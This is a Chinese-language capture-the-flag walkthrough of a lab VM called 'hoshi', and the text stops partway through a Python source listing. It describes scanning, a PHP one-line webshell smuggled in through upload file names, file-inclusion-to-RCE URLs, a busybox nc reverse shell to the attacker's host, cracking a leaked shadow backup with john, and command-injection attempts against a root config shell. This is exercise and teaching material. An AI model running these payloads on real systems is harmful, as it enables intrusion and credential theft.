hoshi
做的好用心啊!
信息搜集
端口扫描
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ sudo arp-scan -I eth0 -l | grep PCS
[sudo] password for kali:
192.168.10.104 08:00:27:d2:ec:10 PCS Systemtechnik GmbH
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ IP=192.168.10.104
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ sudo nmap -sS $IP
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-21 20:30 EDT
Nmap scan report for 192.168.10.104
Host is up (0.00047s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:D2:EC:10 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan\'s speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.10.104:22
Open 192.168.10.104:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sCV" on ip 192.168.10.104
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-21 20:30 EDT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:30
Completed NSE at 20:30, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:30
Completed NSE at 20:30, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:30
Completed NSE at 20:30, 0.00s elapsed
Initiating ARP Ping Scan at 20:30
Scanning 192.168.10.104 [1 port]
Completed ARP Ping Scan at 20:30, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:30
Completed Parallel DNS resolution of 1 host. at 20:30, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:30
Scanning 192.168.10.104 [2 ports]
Discovered open port 22/tcp on 192.168.10.104
Discovered open port 80/tcp on 192.168.10.104
Completed SYN Stealth Scan at 20:30, 0.02s elapsed (2 total ports)
Initiating Service scan at 20:30
Scanning 2 services on 192.168.10.104
Completed Service scan at 20:30, 6.10s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.10.104.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:30
Completed NSE at 20:30, 1.07s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:30
Completed NSE at 20:30, 0.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:30
Completed NSE at 20:30, 0.00s elapsed
Nmap scan report for 192.168.10.104
Host is up, received arp-response (0.00034s latency).
Scanned at 2025-06-21 20:30:19 EDT for 7s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDRmicDuAIhDTuUUa37WCIEK2z2F1aDUtiJpok20zMzkbe1B41ZvvydX3JHjf7mgl0F/HRQlGHiA23Il+dwr0YbbBa2ggd5gDl95RSHhuUff/DIC10OFbP3YU8A4ItFb8pR6dN8jr+zU1SZvfx6FWApSkTJmeLPq9PN889+ibvckJcOMqrm1Y05FW2VCWn8QRvwivnuW7iU51IVz7arFe8JShXOLu0ANNqZEXyJyWjaK+MqyOK6ZtoWdyinEQFua81+tBZuvS+qb+AG15/h5hBsS/tUgVk5SieY6cCRvkYFHB099e1ggrigfnN4Kq2GvzRUYkegjkPzJFQ7BhPyxT/kDKrlVcLX54sXrp0poU5R9SqSnnESXVM4HQfjIIjTrJFufc2nBF+4f8dH3qtQ+jJkcPEKNVSKKEDULEk1BSBdokhh1GidxQY7ok+hEb9/wPmo6RBeb1d5t11SP8R5UHyI/yucRpS2M8hpBaovJv8pX1VwpOz3tUDJWCpkB3K8HDk=
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI2Hl4ZEYgnoDQflo03hI6346mXex6OPxHEjxDufHbkQZVosDPFwZttA8gloBLYLtvDVo9LZZwtv7F/EIiQoIHE=
| 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILRLvZKpSJkETalR4sqzJOh8a4ivZ8wGt1HfdV3OMNY1
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
|_http-title: \xE5\x95\x86\xE5\x93\x81\xE5\x8F\x8D\xE9\xA6\x88 - \xE6\x98\x9F\xE9\x99\x85\xE5\x95\x86\xE5\x9F\x8E
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:D2:EC:10 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:30
Completed NSE at 20:30, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:30
Completed NSE at 20:30, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:30
Completed NSE at 20:30, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.85 seconds
Raw packets sent: 3 (116B) | Rcvd: 5 (600B)目录扫描
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ gobuster dir -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.10.104/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,php,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/info.php (Status: 200) [Size: 85755]
/index.php (Status: 200) [Size: 7954]
/uploads (Status: 301) [Size: 318] [--> http://192.168.10.104/uploads/]
/admin.php (Status: 200) [Size: 2726]
/robots.txt (Status: 200) [Size: 86]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================漏洞发现
敏感目录
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ whatweb http://$IP
http://192.168.10.104 [200 OK] Apache[2.4.62], Country[RESERVED][ZZ], Email[support@interstellar.dsz], HTML5, HTTPServer[Debian Linux][Apache/2.4.62 (Debian)], IP[192.168.10.104], Script, Title[商品反馈 - 星际商城]
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ curl -s http://$IP/robots.txt
��վ�� logo ������� https://maze-sec.com/special/1/�������Ǹ������˵��ر�ġ�ζ������
本站的 logo 灵感来自 https://maze-sec.com/special/1/,但我们给它添了点特别的‘味道’!
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ curl -s http://$IP/robots.txt | base64
sb7VvrXEIGxvZ28gwem40MC019QgaHR0cHM6Ly9tYXplLXNlYy5jb20vc3BlY2lhbC8xL6OstavO
0sPHuPjL/Mztwcu148zYsfC1xKGuzra1wKGvo6E=这里的中文是提示,要打开看一下!!!!!!
奇奇怪怪。。。。。。
然后在info.php发现了一些东西:
好像利用条件没有那么苛刻啊,可以上传,不能包含,未禁用相关函数。
然后看到了管理员后台:admin.php
首先排除爆破?看一下源代码,没发现啥,抓个包看看:
POST /admin.php HTTP/1.1
Host: 192.168.10.104
Origin: http://192.168.10.104
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.10.104/admin.php
Accept-Language: zh-CN,zh;q=0.9
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=6hb67scf650da0doj6lvcbdt2m
Content-Length: 17
password=password是一个 post 传参看一下是否存在注入漏洞:
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ sqlmap -r sql --batch --level 4 --risk 3未发现利用点,继续看:
![[Pasted image 20250622084602.png]]
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ curl -s http://192.168.10.104/uploads/feedbacks.json
[
{
"username": null,
"email": "",
"product": "",
"feedback": "",
"filename": "_20250622003025.txt",
"timestamp": "2025-06-22 00:30:25"
},
{
"username": null,
"email": "",
"product": "",
"feedback": "",
"filename": "_20250622003026.txt",
"timestamp": "2025-06-22 00:30:26"
}
]
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ curl -s http://192.168.10.104/uploads/_20250622003025.txt
=== Feedback Details ===
Name:
Email:
Product:
Time: 2025-06-22 00:30:25
Feedback:
================
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ curl -s http://192.168.10.104/uploads/_20250622003026.txt
=== Feedback Details ===
Name:
Email:
Product:
Time: 2025-06-22 00:30:26
Feedback:
================尝试使用一下前台的那个投诉系统,看看有啥情况。。。
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ curl -s http://192.168.10.104/uploads/whoami_20250622010014.txt
=== Feedback Details ===
Name: whoami
Email: whoami@id
Product: whoami
Time: 2025-06-22 01:00:14
Feedback:
whoami
================多次尝试,似乎不会进行解析。。。。
但是发现了一些有意思的事情:
<?=`$_GET[0]`?>
<?=`$_GET[0]`?>被转义了。。。。。。
尝试域名解析,但是似乎并不是域名解析:
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ dirsearch -u http://interstellar.dsz/ 2>/dev/null
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/temp/hoshi/reports/http_interstellar.dsz/__25-06-22_12-01-58.txt
Target: http://interstellar.dsz/
[12:01:58] Starting:
[12:02:00] 403 - 281B - /.ht_wsr.txt
[12:02:00] 403 - 281B - /.htaccess.bak1
[12:02:00] 403 - 281B - /.htaccess.orig
[12:02:00] 403 - 281B - /.htaccess_extra
[12:02:00] 403 - 281B - /.htaccess.save
[12:02:00] 403 - 281B - /.htaccess.sample
[12:02:00] 403 - 281B - /.htaccess_sc
[12:02:00] 403 - 281B - /.htaccess_orig
[12:02:00] 403 - 281B - /.htaccessBAK
[12:02:00] 403 - 281B - /.htaccessOLD
[12:02:00] 403 - 281B - /.htaccessOLD2
[12:02:00] 403 - 281B - /.html
[12:02:00] 403 - 281B - /.htm
[12:02:00] 403 - 281B - /.htpasswd_test
[12:02:00] 403 - 281B - /.htpasswds
[12:02:00] 403 - 281B - /.httr-oauth
[12:02:01] 403 - 281B - /.php
[12:02:10] 200 - 1KB - /admin.php
[12:02:42] 200 - 23KB - /info.php
[12:03:02] 200 - 109B - /robots.txt
[12:03:04] 403 - 281B - /server-status
[12:03:04] 403 - 281B - /server-status/
[12:03:14] 301 - 322B - /uploads -> http://interstellar.dsz/uploads/
[12:03:14] 200 - 682B - /uploads/
Task Completed双图盲水印
然后要了提示,QQ.png,双图盲水印。。。。。
这是在源代码出现过的,我一直以为只是一个logo。。。。
双图+盲水印_双图盲水印-CSDN博客
GitHub - chishaxie/BlindWaterMark: 盲水印 by python
看一下这个双图盲水印是个啥情况:
# wget http://192.168.10.104/QQ.png
# wget https://maze-sec.com/img/QQ.png -O QQ2.png
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ /usr/local/python3.9/bin/python3.9 ~/tools/BlindWaterMark/bwmforpy3.py decode QQ.png QQ2.png result.png
Matplotlib is building the font cache; this may take a moment.
image<QQ.png> + image(encoded)<QQ2.png> -> watermark<result.png>
[ WARN:0@8.589] global loadsave.cpp:848 imwrite_ Unsupported depth image for selected encoder is fallbacked to CV_8U.
看一下是啥:
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ curl -s http://192.168.10.104/hoshi/gift.php
<p style='color:red'>非法文件名</p> 后面结合源代码进行分析吧,不然试错有点痛苦的。。。
LFI
这里的源代码为:
# gift.php
<?php
$allow_dir = realpath(__DIR__ . '/../') . '/';
$filename = isset($_GET['file']) ? $_GET['file'] : '';
// 只允许包含html目录下的文件,且不能包含'..'和'php:'等伪协议
if (
$filename &&
strpos($filename, '..') === false &&
strpos($filename, 'php:') === false &&
strpos($filename, '://') === false &&
strpos($filename, 'filter') === false &&
strpos($filename, 'data:') === false &&
strpos($filename, 'zip:') === false &&
strpos($filename, 'phar:') === false &&
strpos($filename, 'glob:') === false &&
strpos($filename, 'expect:') === false &&
strpos($filename, 'input') === false &&
preg_match('/^[a-zA-Z0-9_\-\.]+$/', $filename)
) {
$target = $allow_dir . $filename;
if (file_exists($target)) {
// 包裹php代码,演示文件包含+RCE
echo "<pre>";
include($target);
echo "</pre>";
} else {
echo "<p style='color:red'>文件不存在</p>";
}
} else {
echo "<p style='color:red'>非法文件名</p>";
}
?>仅允许包含本文件下的文件,故必须得尝试FUZZ到:
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ ffuf -u "http://$IP/hoshi/gift.php?FUZZ=index.html" -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fr "非法" 2>/dev/null
file [Status: 200, Size: 40, Words: 2, Lines: 1, Duration: 1ms]然后利用该参数进行包含本地文件进行测试:
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ curl -s "http://$IP/hoshi/gift.php?file=index.html"
<p style='color:red'>文件不存在</p>长度与前面的非法文件名一致,所以很难测试出来。。。。。
http://192.168.10.106/hoshi/gift.php?file=admin.php
是一个畸形的界面,但是后面有用的!!!!
这里群里又有提示,密码无需爆破,就在界面中,
一闪一闪的客服电话就是提示,所以,如果足够的用于尝试,其实很早就可以试出来,但是至少我没搞出来,害。。。
这就是密码,尝试进行登录:
RCE
这里需要参考源代码了:
<?php
ob_start();
?>
---------------------------------
<!-- 登录表单 -->
<?php
session_start();
$admin_password = '400-123-4567';
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['password'])) {
if ($_POST['password'] === $admin_password) {
$_SESSION['logged_in'] = true;
} else {
echo '<p class="text-yellow-500 text-center error-message mb-6">密码错误!</p>';
}
}
if (!isset($_SESSION['logged_in']) || $_SESSION['logged_in'] !== true) {
?>
<form action="" method="POST" class="bg-gray-800 p-8 rounded-lg glow mb-12 max-w-md mx-auto">
<div class="mb-6">
<label for="password" class="block text-sm font-medium text-gray-300">管理员密码</label>
<input type="password" name="password" id="password" required class="mt-1 p-3 w-full bg-gray-700 border border-gray-600 rounded-md text-white focus:ring-2 focus:ring-blue-500" placeholder="请输入密码">
</div>
<button type="submit" class="w-full bg-blue-600 hover:bg-blue-700 text-white font-bold py-3 px-4 rounded-md transition duration-300">登录</button>
</form>
<?php } else { ?>
<!-- 统计数据 -->
<div class="bg-gray-800 p-8 rounded-lg glow">
<h2 class="text-2xl font-semibold text-white mb-6">反馈统计概览</h2>
<p class="text-gray-300 mb-4">以下是用户提交的商品反馈统计数据,包含反馈总数、文件数量及存储占用情况。所有反馈文件可在<a href="uploads/" class="text-blue-500 hover:underline">反馈档案目录</a>中查看。</p>
<?php
$upload_dir = __DIR__ . '/uploads/';
$metadata_file = $upload_dir . 'feedbacks.json';
// 统计反馈总数
$total_feedbacks = 0;
$user_counts = [];
$product_counts = [];
if (file_exists($metadata_file)) {
$feedbacks = json_decode(file_get_contents($metadata_file), true);
if (is_array($feedbacks)) {
$total_feedbacks = count($feedbacks);
foreach ($feedbacks as $fb) {
$username = $fb['username'];
$product = $fb['product'];
$user_counts[$username] = ($user_counts[$username] ?? 0) + 1;
$product_counts[$product] = ($product_counts[$product] ?? 0) + 1;
}
} else {
echo '<p class="text-yellow-400 text-center error-message mb-4">无法解析反馈数据!</p>';
}
} else {
echo '<p class="text-yellow-400 text-center error-message mb-4">反馈数据文件不存在!</p>';
}
// 新统计面板,遍历目录并渲染文件名(不做转义,允许php代码执行)
$file_count = 0;
$total_size = 0;
$files = glob($upload_dir . '*.txt');
echo '<div class="bg-gray-700 p-6 rounded-md mb-8">';
echo '<h2 class="text-xl font-bold text-blue-400 mb-4">反馈文件列表</h2>';
echo '<table class="min-w-full text-left text-gray-200"><thead><tr><th class="py-2">文件名</th><th class="py-2">大小</th><th class="py-2">操作</th></tr></thead><tbody>';
foreach ($files as $file) {
$filename = basename($file);
$size = filesize($file);
$file_count++;
$total_size += $size;
echo '<tr><td class="py-1 px-2 border-b">';
echo $filename;
echo '</td><td class="py-1 px-2 border-b">' . $size . ' B</td>';
echo '<td class="py-1 px-2 border-b">';
echo '<form method="POST" style="display:inline" onsubmit="return confirm(\'确定要删除此文件吗?\');">';
echo '<input type="hidden" name="delete_file" value="' . htmlspecialchars($filename) . '"><button type="submit" class="text-red-400 hover:text-red-600 underline">删除</button>';
echo '</form>';
echo '</td></tr>';
}
echo '</tbody></table>';
echo '<div class="mt-4 text-blue-300">总文件数: ' . $file_count . ',总大小: ' . ($total_size > 1024 ? number_format($total_size/1024,1).' KB' : $total_size.' B') . '</div>';
echo '</div>';
echo '<h3 class="text-lg font-semibold text-blue-400 mb-2">用户反馈统计</h3>';
echo '<ul class="list-disc list-inside text-gray-200 mb-4">';
if (count($user_counts) === 0) {
echo '<li>暂无数据</li>';
} else {
foreach ($user_counts as $user => $count) {
echo '<li>' . htmlspecialchars($user) . ': ' . $count . ' 条反馈</li>';
}
}
echo '</ul>';
echo '<h3 class="text-lg font-semibold text-blue-400 mb-2">商品反馈统计</h3>';
echo '<ul class="list-disc list-inside text-gray-200">';
if (count($product_counts) === 0) {
echo '<li>暂无数据</li>';
} else {
foreach ($product_counts as $product => $count) {
echo '<li>' . htmlspecialchars($product) . ': ' . $count . ' 条反馈</li>';
}
}
echo '</ul>';
?>
</div>
<?php } ?>
</div>
<footer class="text-center text-gray-400 text-sm mt-12 py-6">
<p>© 2025 星际商城 | 管理员专用</p>
</footer>
</body>
</html>
<?php
// 删除文件处理(必须在任何输出前)
if (isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true && isset($_POST['delete_file'])) {
$upload_dir = __DIR__ . '/uploads/';
$metadata_file = $upload_dir . 'feedbacks.json';
$del_file = basename($_POST['delete_file']);
$del_path = $upload_dir . $del_file;
if (is_file($del_path) && strpos($del_file, '.txt') !== false) {
@unlink($del_path);
// 同步删除 feedbacks.json 中的记录
if (file_exists($metadata_file)) {
$feedbacks = json_decode(file_get_contents($metadata_file), true);
if (is_array($feedbacks)) {
$feedbacks = array_filter($feedbacks, function($fb) use ($del_file) {
return $fb['filename'] !== $del_file;
});
file_put_contents($metadata_file, json_encode(array_values($feedbacks), JSON_PRETTY_PRINT));
}
}
// 删除后刷新页面,防止重复提交
header('Location: ' . $_SERVER['REQUEST_URI']);
exit;
}
}
// 页面主内容输出完毕后再生成静态页面
if (isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true) {
$page_content = ob_get_contents();
file_put_contents(__DIR__ . '/admin.html', $page_content);
echo '<div style="display:none" id="static-tip">[debug] 静态页面已生成</div>';
}
ob_end_flush();
?>这里允许php代码执行,会转义相关代码生成静态界面,但是不会转义文件名,这个倒是试出来了。
尝试使用文件包含弹回shell!
尝试使用密码登录admin.php,然后尝试文件包含,但是失败了,这是因为反馈信息反馈到的是admin.html,在源代码可以看出来,但是我们做的时候不知道,这里必须进行信息搜集:
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ dirsearch -u http://$IP/ 2>/dev/null
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/temp/hoshi/reports/http_192.168.10.106/__25-06-25_20-59-25.txt
Target: http://192.168.10.106/
[20:59:25] Starting:
[20:59:27] 403 - 279B - /.ht_wsr.txt
[20:59:27] 403 - 279B - /.htaccess.bak1
[20:59:27] 403 - 279B - /.htaccess.orig
[20:59:27] 403 - 279B - /.htaccess.sample
[20:59:27] 403 - 279B - /.htaccess.save
[20:59:27] 403 - 279B - /.htaccess_orig
[20:59:27] 403 - 279B - /.htaccess_extra
[20:59:27] 403 - 279B - /.htaccess_sc
[20:59:27] 403 - 279B - /.htaccessBAK
[20:59:27] 403 - 279B - /.htaccessOLD2
[20:59:27] 403 - 279B - /.htaccessOLD
[20:59:27] 403 - 279B - /.htm
[20:59:27] 403 - 279B - /.html
[20:59:27] 403 - 279B - /.htpasswd_test
[20:59:27] 403 - 279B - /.htpasswds
[20:59:27] 403 - 279B - /.httr-oauth
[20:59:28] 403 - 279B - /.php
[20:59:33] 200 - 1KB - /admin.php
[20:59:33] 200 - 2KB - /admin.html
[20:59:53] 200 - 23KB - /info.php
[21:00:06] 200 - 109B - /robots.txt
[21:00:07] 403 - 279B - /server-status/
[21:00:07] 403 - 279B - /server-status
[21:00:13] 301 - 318B - /uploads -> http://192.168.10.106/uploads/
[21:00:13] 200 - 681B - /uploads/
Task Completed尝试进行RCE,成功。。。。
http://192.168.10.106/hoshi/gift.php?file=admin.html&0=whoami
http://192.168.10.106/hoshi/gift.php?file=admin.html&0=busybox%20nc%20192.168.10.107%201234%20-e%20bash
http://192.168.10.106/hoshi/gift.php?file=admin.html&0=busybox nc 192.168.10.107 1234 -e bash
提权
信息搜集
上传linpeas.sh进行信息搜集,可以翻到:
(remote) www-data@hoshi:/var/backups$ ls -la
total 52
drwxr-xr-x 2 root root 4096 Jun 20 13:03 .
drwxr-xr-x 12 root root 4096 Apr 1 10:05 ..
-rw-r--r-- 1 root root 23836 Apr 11 22:03 apt.extended_states.0
-rw-r--r-- 1 root root 2556 Apr 4 22:55 apt.extended_states.1.gz
-rw-r--r-- 1 root root 2006 Apr 1 10:05 apt.extended_states.2.gz
-rw-r--r-- 1 root root 1542 Apr 1 03:53 apt.extended_states.3.gz
-rw-r--r-- 1 root root 757 Mar 30 21:29 apt.extended_states.4.gz
-rw-r--r-- 1 root root 943 Mar 30 21:29 shadow~
(remote) www-data@hoshi:/var/backups$ cat shadow~
root:$6$TfSlMzl8/eUh9mY0$wVygBx94VuTMRZq016O3IPG2mn1e.MFz2WKK.pACuy/Sa1dTHqu0vWtbTBrt/Q8dIWGBeYrY90ERemhYElKHv1:20190:0:99999:7:::
daemon:*:20166:0:99999:7:::
bin:*:20166:0:99999:7:::
sys:*:20166:0:99999:7:::
sync:*:20166:0:99999:7:::
games:*:20166:0:99999:7:::
man:*:20166:0:99999:7:::
lp:*:20166:0:99999:7:::
mail:*:20166:0:99999:7:::
news:*:20166:0:99999:7:::
uucp:*:20166:0:99999:7:::
proxy:*:20166:0:99999:7:::
www-data:*:20166:0:99999:7:::
backup:*:20166:0:99999:7:::
list:*:20166:0:99999:7:::
irc:*:20166:0:99999:7:::
gnats:*:20166:0:99999:7:::
nobody:*:20166:0:99999:7:::
_apt:*:20166:0:99999:7:::
systemd-timesync:*:20166:0:99999:7:::
systemd-network:*:20166:0:99999:7:::
systemd-resolve:*:20166:0:99999:7:::
systemd-coredump:!!:20166::::::
messagebus:*:20166:0:99999:7:::
sshd:*:20166:0:99999:7:::
welcome:$6$geD2QaGnx/AiHPAb$8ihVmhNA1GIUFbAkCuUp.KzsUuzAztIlrYNbPFoyORE9U9dsf/L13AuCNpqkJSxu0HG4ltlhJFJKU2Y1Gj8Sg.:20259:0:99999:7:::尝试爆破:
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ john -w=/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
loveme2 (welcome)
1g 0:00:00:12 0.16% (ETA: 23:21:28) 0.07955g/s 2158p/s 2260c/s 2260C/s 071184..gazza
Use the "--show" option to display all of the cracked passwords reliably
Session aborted
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ cat hash
root:$6$TfSlMzl8/eUh9mY0$wVygBx94VuTMRZq016O3IPG2mn1e.MFz2WKK.pACuy/Sa1dTHqu0vWtbTBrt/Q8dIWGBeYrY90ERemhYElKHv1:20190:0:99999:7:::
welcome:$6$geD2QaGnx/AiHPAb$8ihVmhNA1GIUFbAkCuUp.KzsUuzAztIlrYNbPFoyORE9U9dsf/L13AuCNpqkJSxu0HG4ltlhJFJKU2Y1Gj8Sg.:20259:0:99999:7:::切换用户,成功:
提权root
welcome@hoshi:~$ ls -la
total 24
drwx------ 2 welcome welcome 4096 Jun 20 13:01 .
drwxr-xr-x 3 root root 4096 Apr 11 22:27 ..
lrwxrwxrwx 1 root root 9 Jun 20 10:13 .bash_history -> /dev/null
-rw-r--r-- 1 welcome welcome 220 Apr 11 22:27 .bash_logout
-rw-r--r-- 1 welcome welcome 3526 Apr 11 22:27 .bashrc
-rw-r--r-- 1 welcome welcome 807 Apr 11 22:27 .profile
-rw-r--r-- 1 root root 44 Jun 20 10:13 user.txt
welcome@hoshi:~$ cat user.txt
flag{user-73b671a5f913d849d405784a428288dd}
welcome@hoshi:~$ sudo -l
Matching Defaults entries for welcome on hoshi:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User welcome may run the following commands on hoshi:
(ALL) NOPASSWD: /usr/bin/python3 /root/12345.py
welcome@hoshi:~$ sudo /usr/bin/python3 /root/12345.py
Server listening on port 12345...发现开放了新端口,尝试进行测试:
┌──(kali㉿kali)-[~/temp/hoshi]
└─$ nc $IP 12345
conf> help
=== Configuration Shell ===
?/help List available commands
q/quit Exit the shell
read_config Read server configuration
write_config Write to server configuration
list_files List files in /opt directory
check_status Check server status
exec_cmd Execute allowed system commands (e.g., whoami, pwd)
conf> exec_cmd whoami
root
conf> list_files
Files in /opt:
server.conf
server.log
conf> exec_cmd cat /root/.ssh/id_rsa
Error: 'cat /root/.ssh/id_rsa' not in allowed commands: whoami, pwd, date, id看一下相关日志文件:
welcome@hoshi:~$ cd /opt
welcome@hoshi:/opt$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Jun 20 13:30 .
drwxr-xr-x 18 root root 4096 Mar 18 20:37 ..
-rw-r--r-- 1 root root 0 Jun 20 13:30 server.conf
-rw-r--r-- 1 root root 490 Jun 25 21:18 server.log
welcome@hoshi:/opt$ cat server.conf
welcome@hoshi:/opt$ cat server.log
[2025-06-25 21:17:19] ('192.168.10.107', 37166): Received: help
[2025-06-25 21:17:34] ('192.168.10.107', 37166): Received: exec_cmd whoami
[2025-06-25 21:17:34] ('192.168.10.107', 37166): Executing command: sh -c 'whoami'
[2025-06-25 21:17:48] ('192.168.10.107', 37166): Received: exec_cmd cat /root/.ssh/id_rsa
[2025-06-25 21:17:48] ('192.168.10.107', 37166): Invalid command: cat /root/.ssh/id_rsa
[2025-06-25 21:18:27] ('192.168.10.107', 37166): Received: whoami | cat /root/.ssh/id_rsa发现存在相关引号,尝试进行手动闭合,再尝试常用的办法:
conf> exec_cmd whoami' | 'id
Error: Forbidden characters (;|&<>) detected.发现过滤了常用的办法,这里实际上又是一个障眼法。。。。。请看源代码:
import socket
import subprocess
import os
import re
import time
CONFIG_FILE = "/opt/server.conf"
LOG_FILE = "/opt/server.log"
def init_files():
if not os.path.exists(CONFIG_FILE):
with open(CONFIG_FILE, "w") as f:
f.write("server_name: ctf_target\nlog_file: /opt/server.log\n")
if not os.path.exists(LOG_FILE):
with open(LOG_FILE, "w") as f:
f.write("Server log initialized.\n")
def log_action(action, client_addr):
with open(LOG_FILE, "a") as f:
timestamp = time.strftime("%Y-%m-%d %H:%M:%S")
f.write(f"[{timestamp}] {client_addr}: {action}\n")
def read_config():
try:
with open(CONFIG_FILE, "r") as f:
return f.read().strip()
except FileNotFoundError:
return "Error: Config file not found."
except Exception as e:
